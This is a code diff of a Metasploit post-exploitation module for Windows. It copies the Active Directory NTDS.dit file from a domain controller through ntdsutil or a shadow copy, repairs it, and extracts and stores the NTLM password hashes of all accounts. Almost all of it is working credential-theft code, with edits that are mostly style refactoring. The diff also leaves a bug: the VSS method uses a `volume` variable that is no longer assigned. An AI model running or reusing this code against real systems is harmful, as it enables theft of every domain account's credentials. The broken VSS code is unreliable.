@@ -28,6 +28,11 @@ class MetasploitModule < Msf::Post
         'Author' => ['theLightCosine'],
         'Platform' => [ 'win' ],
         'SessionTypes' => [ 'meterpreter' ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
+        },
         'Compat' => {
           'Meterpreter' => {
             'Commands' => %w[
@@ -50,24 +55,24 @@ class MetasploitModule < Msf::Post
 
   def run
     if preconditions_met?
-      print_status "Pre-conditions met, attempting to copy NTDS.dit"
+      print_status 'Pre-conditions met, attempting to copy NTDS.dit'
       ntds_file = copy_database_file
       unless ntds_file.nil?
         file_stat = client.fs.file.stat(ntds_file)
-        print_status "NTDS File Size: #{file_stat.size.to_s} bytes"
-        print_status "Repairing NTDS database after copy..."
+        print_status "NTDS File Size: #{file_stat.size} bytes"
+        print_status 'Repairing NTDS database after copy...'
         print_status repair_ntds(ntds_file)
-        realm = sysinfo["Domain"]
+        realm = sysinfo['Domain']
         begin
           ntds_parser = Metasploit::Framework::NTDS::Parser.new(client, ntds_file)
         rescue Rex::Post::Meterpreter::RequestError => e
           print_bad("Failed to properly parse database: #{e}")
-          if e.to_s.include? "1004"
-            print_bad("Error 1004 is likely a jet database error because the ntds database is not in the regular format")
+          if e.to_s.include? '1004'
+            print_bad('Error 1004 is likely a jet database error because the ntds database is not in the regular format')
           end
         end
         unless ntds_parser.nil?
-          print_status "Started up NTDS channel. Preparing to stream results..."
+          print_status 'Started up NTDS channel. Preparing to stream results...'
           ntds_parser.each_account do |ad_account|
             print_good ad_account.to_s
             report_hash(ad_account.ntlm_hash.downcase, ad_account.name, realm)
@@ -89,18 +94,18 @@ class MetasploitModule < Msf::Post
   end
 
   def copy_database_file
-    database_file_path = nil
-    case sysinfo["OS"]
-    when /2003| \.NET/
-      print_status "Using Volume Shadow Copy Method"
-      database_file_path = vss_method
-    when /2008|2012|2016/
-      print_status "Using NTDSUTIL method"
-      database_file_path = ntdsutil_method
-    else
-      print_error "This version of Windows is unsupported"
+    version = get_version_info
+    if version.windows_server?
+      if version.build_number.between?(Msf::WindowsVersion::Server2003_SP0, Msf::WindowsVersion::Server2003_SP2)
+        print_status 'Using Volume Shadow Copy Method'
+        return vss_method
+      elsif version.build_number >= Msf::WindowsVersion::Server2008_SP0
+        print_status 'Using NTDSUTIL method'
+        return ntdsutil_method
+      end
     end
-    database_file_path
+    print_error 'This version of Windows is unsupported'
+    return nil
   end
 
   def ntds_exists?
@@ -110,18 +115,18 @@ class MetasploitModule < Msf::Post
   end
 
   def ntds_location
-    @ntds_location ||= registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\services\\NTDS\\Parameters\\", "DSA Working Directory")
+    @ntds_location ||= registry_getvaldata('HKLM\\SYSTEM\\CurrentControlSet\\services\\NTDS\\Parameters\\', 'DSA Working Directory')
   end
 
   def ntdsutil_method
-    tmp_path = "#{get_env('%WINDIR%')}\\Temp\\#{Rex::Text.rand_text_alpha((rand(8) + 6))}"
+    tmp_path = "#{get_env('%WINDIR%')}\\Temp\\#{Rex::Text.rand_text_alpha(6..13)}"
     command_arguments = "\"activate instance ntds\" \"ifm\" \"Create Full #{tmp_path}\" quit quit"
-    result = cmd_exec("ntdsutil.exe", command_arguments, 90)
-    if result.include? "IFM media created successfully"
+    result = cmd_exec('ntdsutil.exe', command_arguments, 90)
+    if result.include? 'IFM media created successfully'
       file_path = "#{tmp_path}\\Active Directory\\ntds.dit"
       print_status "NTDS database copied to #{file_path}"
     else
-      print_error "There was an error copying the ntds.dit file!"
+      print_error 'There was an error copying the ntds.dit file!'
       vprint_error result
       file_path = nil
     end
@@ -148,24 +153,23 @@ class MetasploitModule < Msf::Post
       return false
     end
 
-    unless session_compat?
-      return false
+    unless session.commands.include?(Rex::Post::Meterpreter::Extensions::Extapi::COMMAND_ID_EXTAPI_NTDS_PARSE)
+      fail_with(Failure::BadConfig, 'Session does not support Meterpreter ExtAPI NTDS parser')
     end
 
-    load_extapi
-    return true
+    session_compat?
   end
 
   def repair_ntds(path = '')
     arguments = "/p /o \"#{path}\""
-    cmd_exec("esentutl", arguments)
+    cmd_exec('esentutl', arguments)
   end
 
   def report_hash(ntlm_hash, username, realm)
     cred_details = {
       origin_type: :session,
       session_id: session_db_id,
-      post_reference_name: self.refname,
+      post_reference_name: refname,
       private_type: :ntlm_hash,
       private_data: ntlm_hash,
       username: username,
@@ -178,8 +182,8 @@ class MetasploitModule < Msf::Post
 
   def session_compat?
     if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
-      print_error "You are running 32-bit Meterpreter on a 64 bit system"
-      print_error "Try migrating to a 64-bit process and try again"
+      print_error 'You are running 32-bit Meterpreter on a 64 bit system'
+      print_error 'Try migrating to a 64-bit process and try again'
       false
     else
       true
@@ -188,15 +192,15 @@ class MetasploitModule < Msf::Post
 
   def vss_method
     unless start_vss
-      fail_with(Failure::NoAccess, "Unable to start VSS service")
+      fail_with(Failure::NoAccess, 'Unable to start VSS service')
     end
     location = ntds_location.dup
-    volume = location.slice!(0, 3)
-    id = create_shadowcopy('#{volume}')
+    location.slice!(0, 3)
+    id = create_shadowcopy(volume.to_s)
     print_status "Getting Details of ShadowCopy #{id}"
     sc_details = get_sc_details(id)
     sc_path = "#{sc_details['DeviceObject']}\\#{location}\\ntds.dit"
-    target_path = "#{get_env('%WINDIR%')}\\Temp\\#{Rex::Text.rand_text_alpha((rand(8) + 6))}"
+    target_path = "#{get_env('%WINDIR%')}\\Temp\\#{Rex::Text.rand_text_alpha(6..13)}"
     print_status "Moving ntds.dit to #{target_path}"
     move_file(sc_path, target_path)
     target_path
